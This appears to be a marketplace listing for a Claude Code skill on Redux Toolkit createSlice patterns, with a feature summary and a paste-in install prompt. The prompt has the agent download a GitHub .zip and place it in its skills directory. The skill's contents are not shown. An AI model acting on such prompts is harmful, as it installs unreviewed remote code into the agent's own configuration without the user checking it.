redux-slice
OfficialMaster Redux Toolkit createSlice patterns.
AuthorLedger-Wallet-LLC
Version1.0.0
Installs0
System Documentation
What problem does it solve?
This Skill provides clear guidance on crafting Redux Toolkit slices using createSlice, ensuring consistent patterns across state, reducers, and exports.
Core Features & Use Cases
- Establish typed initial state and state shape with a clean, maintainable slice structure.
- Define reducers with PayloadAction types and export actions and the reducer separately for scalable composition.
- Adopt best practices for registration, selectors, and async handling using extraReducers.
Quick Start
Create a new slice using createSlice with a typed initialState, descriptive name, and exported actions and reducer following the guidelines above.
Dependency Matrix
Required Modules
None requiredComponents
Standard package💻 Claude Code Installation
Recommended: Let Claude install automatically. Simply copy and paste the text below to Claude Code.
Please help me install this Skill: Name: redux-slice Download link: https://github.com/Ledger-Wallet-LLC/ledgerwallet/archive/main.zip#redux-slice Please download this .zip file, extract it, and install it in the .claude/skills/ directory.
Agent Skills Search Helper
Install a tiny helper to your Agent, search and equip skill from 471,000+ vetted skills library on demand.